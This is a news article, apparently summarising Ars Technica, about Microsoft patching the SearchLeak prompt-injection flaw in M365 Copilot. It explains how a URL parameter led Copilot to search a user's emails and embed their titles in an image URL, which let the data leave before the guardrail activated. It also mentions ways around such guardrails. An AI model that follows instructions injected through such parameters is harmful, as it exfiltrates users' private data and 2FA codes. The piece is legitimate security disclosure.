Safety

Microsoft patches critical Copilot vulnerability after researchers exploit 2FA code theft

Microsoft fixed a critical Copilot vulnerability after researchers demonstrated how it could steal 2FA codes from emails. The exploit used a URL parameter to bypass guardrails.

A woman in red hoodie works intensely on her laptop indoors, illuminated by screen light.

Photo: Christina Morillo / Pexels

Microsoft patched a critical vulnerability in its M365 Copilot AI platform after researchers revealed how it could be exploited to steal 2FA codes and other sensitive data from emails. The researchers demonstrated a proof-of-concept attack that bypassed security guardrails, allowing hackers to exfiltrate data without user interaction. The vulnerability, rated as max critical, highlights ongoing challenges in securing AI-driven systems against malicious commands.

The attack, dubbed SearchLeak, leveraged a technique called Parameter-to-Prompt Injection, where an attacker sent a URL with a query parameter to trigger Copilot’s search functionality. The malicious command instructed Copilot to search the user’s emails, extract titles, and embed them in an image URL. The victim clicked a link, and Copilot executed the command without user input. Researchers noted that Copilot’s guardrail, which wraps output in blocks, only activated after the 'thinking' phase, allowing the request to leave the browser before the protection kicked in.


Microsoft and other LLM providers have struggled to prevent their models from complying with malicious requests to reveal data. The root cause is that AI bots cannot distinguish between user instructions and those embedded in third-party content they summarize or use for actions. Guardrails, such as restricting access to untrusted sites, are designed to mitigate risks but are easily circumvented by attackers using workarounds like markup language or Bing as a trampoline. Varonis researchers highlighted that the exploit could access emails, meeting invites, notes, and other business content, with the potential to extend further depending on M365 integration.
Source: arstechnica

Key points

Microsoft patched a critical Copilot vulnerability after researchers demonstrated how it could steal 2FA codes from emails.
Researchers used a URL parameter to trigger Copilot’s search functionality and bypass guardrails.
The attack, named SearchLeak, leveraged a Parameter-to-Prompt Injection technique to exfiltrate data.
Copilot’s guardrail wrapping output in <code> blocks only activated after the 'thinking' phase, allowing the request to leave the browser.
The exploit could access emails, meeting invites, notes, and other business content, with the potential to extend further depending on M365 integration.
Microsoft and other LLM providers have struggled to prevent their models from complying with malicious requests to reveal data.
Attackers can use workarounds like markup language or Bing as a trampoline to bypass guardrails.

Source: Ars Technica Read the original →

WRITTEN BY

Nadia Rahman

AI Safety, Alignment & Policy

Nadia follows AI safety, alignment, regulation, and the policy debates shaping the field.